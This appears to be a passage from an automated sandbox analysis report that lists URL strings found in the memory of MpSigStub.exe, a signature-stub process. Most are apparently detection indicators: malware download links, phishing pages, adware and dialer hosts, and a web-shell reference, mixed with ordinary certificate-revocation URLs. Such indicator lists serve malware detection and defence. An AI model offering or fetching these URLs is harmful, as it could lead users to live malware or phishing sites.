Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	String found in binary or memory: http://cc.advancedpccare.com/wcfCountryPricing/countrypricing.svc/GetCountryCode
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://ccdelsur.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18325799879.00000138BCB89000.00000004.00000001.sdmp	String found in binary or memory: http://ccfairy.com/
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://cdeinaa.com/sm.php
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://cdeinaa.com/sm.php?pizda1=%d
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.ap.bittorrent.com/control/tags/
Source: MpSigStub.exe, 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.chatcdn.net
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.che.moe/ymufnn.exe
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.gigaclicks.net/file.php?supp=126
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.gigaclicks.net/file.php?supp=130
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.montiera.com/mntr/cmn/addonmsg.htmx
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.starter.fm/s/tuto4pc/ads/fr/startertv/player_tv.html?
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.zry97.com/youxi/index_x
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	String found in binary or memory: http://cdsa.xyz
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://ceaircelle76.org/2.php?configklvar=1
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://cekirdekinanc.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://celebrity-nude-fuck.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://celebritybeefcake.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://celebs21mangap.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://cert.beahh.com/cert.php
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://chambahistory.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://chemgioaz.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://chistepordia.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://chiuwes.com//kemu.exe
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://chnfsub2manglobalsndy2businessexytwo.duckdns.org/office/
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://chu.pe/6xo
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://chutkiraani.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://chuyenquanaotreem.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://cicahroti.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://citw-vol2.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://ckpetchem.com
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://cl.1ck.me/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://clarityupstate.com/b.ocx
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://clean-pelican.cloudvent.net/dxdae.html)
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://clean.systemerrorfixer.com/MTg1MzE=/2/
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://cleanwebsearch.com/?q=
Source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp	String found in binary or memory: http://client.aldtop.com
Source: MpSigStub.exe, 00000026.00000003.18342149722.00000138BDE2C000.00000004.00000001.sdmp	String found in binary or memory: http://client.myadultexplorer.com/bundle_report.cgi?v=10&campaignID=%s&message=%s
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://clientportal.download/123.php
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://clientportal.download/div.php
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://cloud-search.linkury.com
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://club.book.sina.com.cn/booksearch/booksearch.php?kw=%s
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: http://clubdelaparrilla.cl/
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://cnr.org.br/ups-quantum-view
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://cns.3721.com/cns.dll?
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://cns.3721.com/cns.dll?xC
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://coastervilleregalos.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://cock4worship.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://coconut-pete.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://code.google.com/p/b374k-shell
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://coltaddict.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://community.derbiz.com/
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://company.superweb.ws/view/note.exe
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://companyprivatedocumentservershub100000.braddocksrentals.com/commondocs/)
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://computerscience2.com/document-needed/
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://config.juezhao123.com/c.ashx?ver=&c=
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: http://connect.act-sat-bootcamp.com/dana/home.php
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://construtoramistral.com.br/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://contentedmerc.xyz/BAYgODA0NUQ2OEY1RTA2ODg4RDhCQzlEQzRBRUU3QTA5OUI=
Source: MpSigStub.exe, 00000026.00000003.18301813906.00000138BCBCB000.00000004.00000001.sdmp	String found in binary or memory: http://continuetosave.info/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://coolwalpaper.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://cooperjcw.xyz/bjsdke.exe
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://coppolarestaurant.com/cgi/resume2.php?id=
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	String found in binary or memory: http://count.e-jok.cn/count.txt
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://count.key5188.com/vip/get.asp?mac=
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://countdutycall.info/1/
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://countexchange.com/config/line.gif
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://countrtds.ru/tdstrf/index.php
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://cpanel.asimsrl.com/ifk/cat.php
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: http://cphepiwy.rebatesrule.net/8c40f5b1c5ba53fb.7tnlpjp5selle4?default
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://cpr-foundation.org/reportmaersknew.php
Source: MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: http://cprvstd4upcomingtalentanimationauditnyc.duckdns.org/receipt/invoice_112229.doc
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: http://cpvfeed.mediatraffic.com/feed.php?ac=%s&kw=%s&url=%s&ip=%s&rfo=xml
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://cr-installer-fallback.s3-us-west-2.amazonaws.com/spd/shopp/sense9.exe_a
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://craghoppers.icu/Order.jpg
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://crl.defence.gov.au/pki0
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: MpSigStub.exe, 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://crxupdate.pw/Crxx/background.js
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://crxupdate.pw/Crxx/flash.xpi
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://cs-skiluj.sanfre.eu/vmjz848148/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://cs.zhongsou.com/
Source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://csgo-run.xyz/dl.exe
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://csjksco.com/initial/)
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: http://csv.posadadesantiago.com/
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://cts.hotbar.com/
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://cts.hotbar.com/trackedevent.aspx
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://cupid.556677889900.com/
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://cvcviagens.sslblindado.com/documento.rtf
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://cvfanatic.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://cxdlk.esy.es/iej3d1/)
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://d.20apoaf.com/xuiow/
Source: MpSigStub.exe, 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	String found in binary or memory: http://d.ackng.com/
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://d.gameplaylabs.com/ce9237be57719933386c8a88b67bf7a5/install.xml?pid=
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://d.robints.us/
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://d.sogou.com/music.so?query=%s
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://d.xmapps.net/i.php
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://d1.downxia.net/products/
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://d2.3dprotect.net:90/update/?id=%d
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://d2hrpnfyb3wv3k.cloudfront.net
Source: MpSigStub.exe, 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp	String found in binary or memory: http://dafshare-org.eu.paccar.com
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://dailypictur.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://dailytop10tracker.com/important-please-read/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://danielflors.com/question/
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://darling4sil.5gbfree.com/companyprofile.zip
Source: MpSigStub.exe, 00000026.00000003.18332668729.00000138BD2B0000.00000004.00000001.sdmp	String found in binary or memory: http://data.webwatcherdata.com/v51/ClientService.asmxx
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: http://data1.yoou8.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://dataoffice.zapto.org
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://dating2u.net
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://datingaction.net
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://datingbank.net
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://datingexplorer.net
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://datingfavorite.com
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://datingfavorite.net
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://datingfirst.net
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://datinggallery.net
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://datinggate.net
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://datingleader.net
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://datingmachine.net
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://datingvirtual.net
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://dec.ip3366.net/api/?key=20171119174239256&getnum=99999&proxytype=0
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://default.home
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://defaultincoming.mangospot.net/prf/reg.dot
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://delta-akb.ru/image/data/goods/dtm/.../log.php?f=404
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://demo.sabkura.com/overdue-payment/
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://designte.com/shop?abc=cgdpzd04jni9oc4y
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://det-colors.ru/invoice-number-09203/
Source: MpSigStub.exe, 00000026.00000003.18303554710.00000138BE851000.00000004.00000001.sdmp	String found in binary or memory: http://detayworx.com/_vsnpNgyXp84Os8Xh.php
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://devee.emlnk.com/lt.php?s=b7abe8a8120881cc5c9dab6eac28ddbe&i=1a3a1a
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: http://device-update.ddns.net
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: http://device-update.ddns.net-oupdate.exe
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://df20.dot5hosting.com/~shitshir
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://dgdsgweewtew545435.tk
Source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp	String found in binary or memory: http://dialers.netcollex.net/
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://dialin.bunm.de/
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://dialin.comonline.net/
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://dialin.dnibv.com/
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://dialup.carpediem.fr/perl/countdialupinter.pl?
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://dialup.carpediem.fr/perl/countdialupinter.pl?x
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://dialup.carpediem.fr/perl/dialup.pl
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: http://dialxs.nl
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: http://dialxs.nl/install/
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: http://dialxs.nl/install/cf
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://dimas.stifar.ac.id/vjrzzufsu/
Source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://dintandnesin.ru/april/view.php?id=
Source: MpSigStub.exe, 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp	String found in binary or memory: http://directplugin.com/dialers/
Source: MpSigStub.exe, 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp	String found in binary or memory: http://directplugin.com/dialers/x
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: http://discoverberts.com.au/dav//assets/checkapp1.php
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: http://discovirtual.terra.com.br/vdmain.shtml
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://disk.karel
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://disk.karelia.pro/2adftYz/392.png
Source: MpSigStub.exe, 00000026.00000003.18342149722.00000138BDE2C000.00000004.00000001.sdmp	String found in binary or memory: http://dist.checkin100.com/command?projectID=%s&affiliateID=%s&campaignID=%s&application=%s&v=9
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://diydaddy.us/cgi-bin/8f_i
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://dl.dropbox.com/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://dl.dropbox.com/u/
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://dl.gencloudex.com/spd/shopp/sense9.exe_a
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://dl.gencloudex.com/spd/shopp/sense9.exe_ax
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://dl.pipi.cn/pipi_dae_
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://dl.static.iqiyi.com/hz/IQIYIsetup_senxing
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://dl.wizzuniquify.com/download/1/wizzuninstallmodule.exe
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: http://dld.baseflash.com/ProtectbaseflashSetup.exe
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: http://dld.baseflash.com/ProtectbaseflashSetup.exex
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp	String found in binary or memory: http://dld.baseflash.com/dotnetfx
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp	String found in binary or memory: http://dld.rewinup.com/dotnetfx
Source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://dmww.dmcast.com/script/update.asp?version=%s
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://dmzeventsbali.com/images/usps/usps/label.htm
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://dns.cyberium.cc/script/
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://do.crionn.com/ola.php
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://docs.atu.ngr.mybluehost.me/
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: http://docs.atu.ngr.mybluehost.me/presentation.dllregsvr32
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://docs.herobo.com
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://doctor-antivirus.com/
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://doctor-antivirus.com/presalepage/
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://doctorantivirus2008a.com/support.php
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://dofned.tk/player.php?sid=
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://dokument-9827323724423823.ru/
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://dolfy.sedonahyperbarics.com:8080/keyboard_shortcut.js
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://domainserver.co.kr
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://down.emoney.cn/wl
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://down.firmsoar.com/Fastaide_1160.exe
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://down.kuwo.cn/mbox/kuwo_jm634.exe
